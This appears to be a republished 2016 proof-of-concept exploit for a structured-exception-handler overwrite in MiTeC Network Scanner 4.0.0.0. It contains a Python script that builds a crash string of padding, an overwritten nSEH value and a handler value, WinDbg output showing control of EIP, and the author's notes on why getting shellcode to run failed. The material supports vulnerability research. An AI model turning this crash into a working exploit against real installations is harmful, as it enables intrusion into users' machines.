Network Scanner Version 4.0.0.0 - SEH Crash POC
Source: http://binsect00.tistory.com  Author: INSECT.B  Published: 2016-02-16
#-*- coding: utf-8 -*-
#
# Exploit Title: Network Scanner Version 4.0.0.0  SEH Crash POC
# POC Dork: N/A
# Date: 2016-02-15
# Author: INSECT.B
#   Twitter : @INSECT.B
#   Facebook : https://www.facebook.com/B.INSECT00
#   Blog : http://binsect00.tistory.com
# Vendor Homepage: http://www.mitec.cz/
# Software Link: http://www.mitec.cz/Downloads/NetScan.zip
# Version: 4.0.0.0
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
  
'''
[+] Type : SEH
[-] Paste the string this script writes out into the [TOOLS] tab, 'Detect IP from Host name...' field
[-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[-] crash info
(2d0.878): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
42424242 ??              ???
 
0:000> !exchain
0012edec: ntdll!ExecuteHandler2+3a (772571cd)
0012f534: 42424242
Invalid exception stack at cccccccc
 
0:000> d 12f534
0012f534  cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43  ....BBBBCCCCCCCC
0012f544  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f554  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f564  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f574  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f584  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f594  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5a4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0:000> d
0012f5b4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5c4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5d4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5e4  43 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00  CCC...1t........
0012f5f4  0a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00  ......$.........
0012f604  ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00  ....4......w..$.
0012f614  15 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00  ................
0012f624  cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00  ................
 
 
'''
 
# Layout: 76 bytes of padding, then the SEH record (nSEH pointer, handler pointer), then filler.
junk1 = b"A" * 76            # padding up to the SEH record
nSEH = b"\xcc\xcc\xcc\xcc"   # next-SEH pointer, overwritten with 0xcccccccc (see !exchain above)
SEH = b"BBBB"                # handler pointer, overwritten with 0x42424242 (eip in the crash info)
shell = b"C" * 300           # filler after the record

payload = junk1 + nSEH + SEH + shell
with open("netEx.txt", "wb") as f:
    f.write(payload)
print(payload.decode("latin-1"))
 
"""
Exploit problem
 
1. Input string(value) was replaced '0x3f' in the memory. then shellcode should be encoded to alpha_mixed.
   Buffer size was 171 bytes. but, encoded shellcode size was over 600 bytes.
 
2. Null byte cannot be inserted into Input field. so we can't use SEH pointer in a range of NetScanner.exe address (0x00400000~0x008c3000)
 
3. payload was consisted of  'junk - shellcode - nSEH ptr - SEH ptr'. but this step was fail. because junk buffer size was 76 bytes.
   Can't insert shellcode
 
"""
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved